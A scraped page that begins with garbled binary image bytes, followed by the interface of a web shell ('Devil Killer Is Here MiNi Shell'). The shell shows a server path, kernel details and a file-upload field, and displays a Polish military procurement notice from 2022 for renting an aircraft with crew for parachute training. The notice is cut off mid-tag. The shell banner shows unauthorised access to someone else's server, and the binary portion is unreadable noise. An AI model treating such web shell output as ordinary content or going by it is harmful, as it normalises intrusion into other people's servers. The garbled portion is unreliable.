JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220228/0007005901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> USŁUGA WYNAJMU CYWILNEGO STATKU POWIETRZNEGO WRAZ Z ZAŁOGĄ DO PRZEPROWADZENIA SZKOLENIA DESANTOWEGO – SPADOCHRONOWEGO DLA JEDNOSTEK WOJSKOWYCH 25 BKPow </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">31 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sekcja Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 101067256</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Konstantynowska 85</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">31wog.zp@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://31wog.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> USŁUGA WYNAJMU CYWILNEGO STATKU POWIETRZNEGO WRAZ Z ZAŁOGĄ DO PRZEPROWADZENIA SZKOLENIA DESANTOWEGO – SPADOCHRONOWEGO DLA JEDNOSTEK WOJSKOWYCH 25 BKPow </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-97489745-9611-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00070059</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00058723/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Wynajem samolotu do ćwiczeń spadochronowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/31wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/31wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim elektronicznie<br/>za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/31wog<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były<br/>za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość<br/>do zamawiającego”.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>Wszelkie zapisy dotyczące korespondencji elektronicznej znajduje się w SWZ w rozdziale VIII.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest 31. WOJSKOWY ODDZIAŁ GOSPODARCZY, ul. Konstantynowska 85, 95 – 100 ZGIERZ, tel. 261 442 002, 31wog.kancelaria@ron.mil.pl reprezentowany przez KOMENDANTA,<br/><br/>2. u administratora danych osobowych wyznaczony jest Inspektor Ochrony Danych Osobowych, z którym można się skontaktować poprzez email: 31wog.iod@ron.mil.pl. lub telefonicznie nr 261 442 275,<br/><br/>3. dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniami o udzielenie zamówienia publicznego,<br/><br/>4. odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/><br/>5. dane osobowe Wykonawcy będą przechowywane, zgodnie art. 78 ustawy PZP, w zw. z Jednolitym Rzeczowym Wykazem Akt 31.Wojskowego Oddziału Gospodarczego, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/><br/>6. obowiązek podania przez Wykonawcę danych osobowych dotyczących bezpośrednio Wykonawcy jest wymogiem ustawowym określonym<br/>w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. Wykonawca posiada:<br/>− na podstawie art. 15 RODO, prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO, prawo do sprostowania danych osobowych Wykonawcy *;<br/>− na podstawie art. 18 RODO, prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>9. Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art.. 6 ust. 1 lit. c RODO.<br/>_____________________<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">43/ZP/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa wynajmu cywilnego statku powietrznego wraz z załogą do przeprowadzenia szkolenia desantowego – spadochronowego dla jednostek wojskowych 25 BKPow.<br/>Zadanie 1<br/><br/>Celem zamówienia jest realizacja usługi polegającej na wykorzystaniu cywilnego statku powietrznego do szkolenia spadochronowego żołnierzy i instruktorów spadochronowych wykonujących skoki na wolne otwarcie do wysokości 4000 metrów <br/><br/>L.p.	ILOŚĆ	TYP<br/>1.	225 wylotów <br/>(minimum 15 skoczków) <br/>	skoki na wolne otwarcie<br/>do wysokości 4000 metrów <br/><br/>1.	Wykonawca musi zapewnić lotnisko spełniające wymagania zrzutowiska dla spadochronów szybujących w odległości od Leźnicy Wielkiej do 200 km.<br/>2.	Statek powietrzny musi być przystosowany do zrzutu skoczków oraz posiadać dokumentację eksploatacyjną dopuszczającą do desantowania metodą spadochronową na wolne otwarcie. <br/>3.	Możliwości załadowcze statku powietrznego minimum 15 skoczków<br/>4.	Czas wylotu od momentu załadowania do momentu zrzutu nie dłuższy niż 25 minut.<br/>5.	Samolot jednosilnikowy lub dwusilnikowy z szerokim wyjściem bocznym lub tylnym.<br/>6.	Teren zrzutowiska do skoków zapewnia i zabezpiecza Wykonawca. <br/>7.	Zrzutowisko znajduje się w rejonie startu spadochronowego.<br/>8.	Wykonawca musi zapewnić przestrzeń powietrzną w rejonie zrzutowiska oraz zabezpieczyć kierowanie lotami na czas desantowania (kierownik lotów znajduje się przy kierowniku desantowania od momentu rozpoczęcia skoków do zakończenia). Na wykorzystywanym do skoków lotnisku w godzinach szkolenia nie mogą występować żadne ograniczenia związane z korzystaniem strefy zrzutu do wysokości 4000 m <br/>9.	Decyzję o starcie w celu wykonania zrzutu skoczków podejmuje pilot z pełnymi konsekwencjami braku dokonania zrzutu nie z winy Zamawiającego (brak zgody na zrzut wydany przez Organ Kontroli Przestrzenią Powietrzną i lądowanie ze skoczkami na pokładzie statku powietrznego).W powyższym wypadku wylot będzie traktowany jako niezrealizowany.<br/>10.	Desantowanie realizowane będzie w dni powszednie od poniedziałku do piątku w terminach 01.04.2022 -30.11.2022r.<br/>11.	Zabezpieczenie desantowania realizuje Zamawiający.<br/>12.	Wykonawca zapewni miejsce przykryte dachem przy zrzutowisku do układania spadochronów (jednoczesne układanie min. 50 spadochronów).<br/>13.	Wykonawca zapewni bezpieczne i chronione miejsce na terenie lotniska do przechowywania 100 kompletów spadochronów oraz sprzętu podczas szkolenia.<br/>14.	Wykonawca zapewnia do wykorzystania Zamawiającemu w czasie szkolenia stały dostęp do Internetu dla min. 10 komputerów oraz zestaw komputerowy z pakietem min. Microsoft Office ze stałym łączem do Internetu wraz z drukarką z możliwością wydruku w kolorze.<br/>15.	Wykonawca na prośbę Zamawiającego wskaże miejsca noclegowe lub wydzieli miejsce na terenie lotniska do rozbicia namiotów polowych dla uczestników szkolenia oraz zapewni darmowy dostęp do sanitariatów (WC, prysznice, umywalnia).<br/>16.	Usługa musi być realizowana przez wykwalifikowaną kadrę pilotów posiadających aktualne uprawnienia (licencje i badania lotnicze), niezbędne dla personelu lotniczego w świetle polskiego prawa lotniczego, do prowadzenia statków powietrznych i zrzucania skoczków.<br/>17.	Wykonawca zobowiązany jest każdorazowo przed planowanym wykorzystaniem statku powietrznego do zapewnienia we własnym zakresie wszystkich niezbędnych zezwoleń, dokumentów, sił i środków do wykonywania lotów i dokonywania zrzutu skoczków w wyznaczonym miejscu i czasie szkolenia.<br/>18.	Wykonawca zobowiązany jest do zapewnienia możliwości bez opłat wjazdu i parkowania pojazdów przyjeżdżających na zabezpieczenie szkolenia.<br/>19.	Samolot musi być dopuszczony, w świetle polskiego prawa lotniczego, do wykonywania lotów i wykonywania skoków spadochronowych z jego pokładu (posiadać ważne do końca trwania umowy certyfikaty wystawione przez ULC). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60424100-7 - Wynajem statków powietrznych wraz z załogą</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji (art. 441 ust. 1 ustawy PZP) polegającego na możliwości zwiększenia podstawowego zakresu usług, maksymalnie o 10%. Skorzystanie przez Zamawiającego z prawa opcji będzie miało zastosowanie w ramach zawartej umowy według ceny jednostkowej za 1 wylot. Uruchomienie prawa opcji nastąpi, na pisemny wniosek Zamawiającego. Realizacja prawa opcji nastąpi w trakcie trwania umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-04-01 do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami oraz w następujący sposób będzie oceniać oferty:<br/>ZADANIE NR 1 - 2<br/><br/>L.p.	Rodzaj kryterium	Liczba punktów (waga)<br/>1	Cena 60<br/>2	Nalot oferowanego samolotu	40<br/><br/>Kryterium „Cena” – 60 pkt.<br/><br/> cena brutto oferty najniżej skalkulowanej <br/> Liczba punktów oferty = ------------------------------------------------------------- x 60<br/> cena brutto badanej oferty <br/> <br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena za realizacje zamówienia .<br/><br/>Kryterium „Nalot oferowanego samolotu” – 40 pkt.<br/><br/>Wykonawca w Formularzu ofertowym stanowiącym Załącznik nr 2 do SWZ zobowiązany jest podać informację o nalocie oferowanego samolotu/silnika oferowanego samolotu.<br/>Liczba punktów zostanie przyznana jak poniżej:<br/>•	do 500 godzin – 40 pkt,<br/>•	od 501 do 1000 godzin – 20 pkt,<br/>•	powyżej 1001 godzin – 0 pkt.<br/><br/>Punkty w danym zadaniu przyznane w ramach każdego kryterium zostaną zsumowane. <br/><br/>Jeżeli Wykonawca nie poda w ofercie kryteriów oceny ofert jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy PZP.<br/><br/><br/>PUNKTACJA BĘDZIE LICZONA DLA KAŻDEGO ZADANIA OSOBNO !</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Nalot oferowanego samolotu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa wynajmu cywilnego statku powietrznego wraz z załogą do przeprowadzenia szkolenia desantowego – spadochronowego dla jednostek wojskowych 25 BKPow.<br/>Celem zamówienia jest realizacja usługi polegającej na wykorzystaniu cywilnego statku powietrznego do szkolenia spadochronowego żołnierzy <br/>i instruktorów spadochronowych 25.BKPow wykonujących skoki na wolne otwarcie z zasobnikiem do 30 kg i bez zasobnika z wysokości do 4000 metrów<br/><br/>L.p.	ILOŚĆ	TYP<br/>1.	25 wylotów <br/>(minimum 16 skoczków)	skoki na wolne otwarcie<br/>z wysokości 4000 metrów<br/>(z zasobnikiem lub bez zasobnika)<br/><br/>1.	Wykonawca musi zapewnić lotnisko spełniające wymagania zrzutowiska dla spadochronów szybujących w odległości od Tomaszowa Mazowieckiego do 200 km.<br/>2.	Statek powietrzny musi być przystosowany do zrzutu skoczków oraz posiadać dokumentację eksploatacyjną dopuszczającą do desantowania metodą spadochronową na wolne otwarcie. <br/>3.	Minimalne możliwości załadowcze statku powietrznego (minimum 16 skoczków z zasobnikiem lub 21 skoczków bez zasobnika).<br/>4.	Czas wylotu od momentu załadowania do momentu zrzutu nie dłuższy niż 25 minut.<br/>5.	Samolot dwusilnikowy z szerokim wyjściem tylnym zapewniający wyjście grupy (formacji) 4-6 skoczków z zasobnikiem czasie 1-2 sekund.<br/>6.	Teren zrzutowiska do skoków zapewnia i zabezpiecza Wykonawca.<br/>7.	Zrzutowisko znajduje się w rejonie startu spadochronowego.<br/>8.	Wykonawca musi zapewnić przestrzeń powietrzną w rejonie zrzutowiska oraz zabezpieczyć kierowanie lotami na czas desantowania (kierownik lotów znajduje się przy kierowniku desantowania od momentu rozpoczęcia skoków do zakończenia). Na wykorzystywanym do skoków lotnisku w godzinach szkolenia nie mogą występować żadne ograniczenia związane z korzystaniem strefy zrzutu do wysokości 4000 m. <br/>9.	Decyzję o starcie w celu wykonania zrzutu skoczków podejmuje pilot z pełnymi konsekwencjami braku dokonania zrzutu nie z winy Zamawiającego (brak zgody na zrzut wydany przez Organ Kontroli Przestrzenią Powietrzną i lądowanie ze skoczkami na pokładzie statku powietrznego).W powyższym wypadku wylot będzie traktowany jako niezrealizowany.<br/>10.	Desantowanie realizowane będzie w dni powszednie od poniedziałku do piątku w terminach 01.04.2022 r. - 30.11.2022 r.<br/>11.	Zabezpieczenie desantowania realizuje Zamawiający.<br/>12.	Terminy realizacji desantowania podane zostaną przez przedstawiciela Zamawiającego z wyprzedzeniem 7 dni. W przypadku niekorzystnych warunków meteorologicznych ustalony termin desantowania zostanie przesunięty na inny.<br/>13.	W przypadku wykonywania w danym terminie zadań z innym podmiotem, wykonawca zobowiązany jest skoordynować zadania. W przypadku nie wywiązania się z powyższego zobowiązania zamawiający może odstąpić od umowy.<br/>14.	Wykonawca zapewni miejsce przykryte dachem przy zrzutowisku do układania spadochronów (jednoczesne układanie min. 50 spadochronów).<br/>15.	Wykonawca zapewni miejsce i zabezpieczenie przy zrzutowisku do przechowywania 100 kompletów spadochronów oraz sprzętu podczas szkolenia. Miejsce do przechowywania sprzętu zabezpieczone systemem alarmowym oraz monitoringiem.<br/>16.	Wykonawca zapewnia do wykorzystania Zamawiającemu w czasie szkolenia stały dostęp do Internetu dla min. 10 komputerów oraz zestaw komputerowy z pakietem min. Microsoft Office ze stałym łączem do Internetu wraz z drukarką z możliwością wydruku w kolorze.<br/>17.	Wykonawca na prośbę Zamawiającego zabezpieczy wydzieli miejsce na terenie lotniska do rozbicia namiotów polowych dla uczestników szkolenia oraz zapewni darmowy dostęp do sanitariatów (WC, prysznice, umywalnia).<br/>18.	Usługa musi być realizowana przez wykwalifikowaną kadrę pilotów posiadających aktualne uprawnienia (licencje i badania lotnicze), niezbędne dla personelu lotniczego w świetle polskiego prawa lotniczego, do prowadzenia statków powietrznych i zrzucania skoczków.<br/>19.	Wykonawca zobowiązany jest każdorazowo przed planowanym wykorzystaniem statku powietrznego do zapewnienia we własnym zakresie wszystkich niezbędnych zezwoleń, dokumentów, sił i środków do wykonywania lotów i dokonywania zrzutu skoczków w wyznaczonym miejscu i czasie szkolenia.<br/>20.	Wykonawca zobowiązany jest do zapewnienia możliwości bez opłat wjazdu i parkowania pojazdów przyjeżdżających na zabezpieczenie szkolenia.<br/>21.	Samolot musi być dopuszczony, w świetle polskiego prawa lotniczego, do wykonywania lotów i wykonywania skoków spadochronowych z jego pokładu (posiadać ważne do końca trwania umowy certyfikaty wystawione przez ULC -SPO). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60424100-7 - Wynajem statków powietrznych wraz z załogą</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span 